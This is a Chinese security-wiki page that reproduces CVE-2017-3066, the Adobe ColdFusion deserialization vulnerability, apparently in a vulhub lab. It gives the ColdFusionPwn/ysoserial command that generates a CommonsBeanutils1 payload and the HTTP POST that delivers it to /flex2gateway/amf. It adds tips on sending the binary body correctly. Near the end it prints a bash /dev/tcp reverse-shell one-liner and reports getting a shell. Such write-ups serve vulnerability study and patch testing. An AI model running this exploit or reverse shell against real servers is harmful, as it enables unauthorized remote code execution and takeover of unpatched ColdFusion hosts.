menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 005-Adobe ColdFusion chevron_right 002-CVE-2017-3066 Adobe ColdFusion 反序列化漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    002-CVE-2017-3066 Adobe ColdFusion 反序列化漏洞.md
    2.13 KB / 2021-07-17 00:01:20
        # CVE-2017-3066 Adobe ColdFusion 反序列化漏洞
    
    ### 漏洞影响
    
    Adobe ColdFusion (2016 release) Update 3及之前的版本,
    
    ColdFusion 11 Update 11及之前的版本,
    
    ColdFusion 10 Update 22及之前的版本。
    
    ### 复现过程
    
    使用ColdFusionPwn工具来生成POC。
    
    点击下载ColdFusionPwn
    
    **Usage**
    
    `java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]`
    
    点击下载ysoserial:http://wiki.0-sec.org/download/ysoserial.zip
    
    【注意】下载的jar包可能因为时间不同,而更新,包名也就不同。注意将命令中的包名,替换为你下载时候的名字
    
    
    ```
    java -cp ColdFusionPwn.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/CVE-2017-3066_is_success' poc.ser
    ```
    
    生成poc.ser文件后,将POC作为数据包body发送给`http://your-ip:8500/flex2gateway/amf`,Content-Type为application/x-amf
    
    
    ```bash
    POST /flex2gateway/amf HTTP/1.1
    Host: your-ip:8500
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-amf
    Content-Length: 2853
    
    [...poc...]
    ```
    
    ![](images/15889268556664.png)
    
    
    关于发送的内容编码问题
    
    由于编码问题,如果直接从Notepad++/Notepad里面复制粘贴为body部分,是不成功的,即使返回的状态码是200
    
    正确发送方式为:
    
    右击选择Paste From File,上传poc.cer文件
    
    ![](images/15889268663079.png)
    
    
    再到Raw界面添加HTTP头部,如果成功,并且打算以后还需要用的话,右击选择Copy to File保存
    
    ![](images/15889268774056.png)
    
    
    进入容器中,发现/tmp/success已成功创建:
    
    ![](images/15889268910263.png)
    
    
    将POC改成反弹命令,成功拿到shell:
    
    ![](images/15889268982966.png)
    
    
    补充一下反弹shell的命令,可以通过http://www.jackson-t.ca/runtime-exec-payloads.html在线转换
    
    `bash -i >& /dev/tcp/ip/port 0>&1`
    
    ### 参考链接
    
    https://vulhub.org/#/environments/coldfusion/CVE-2017-3066/
    
    links
    file_download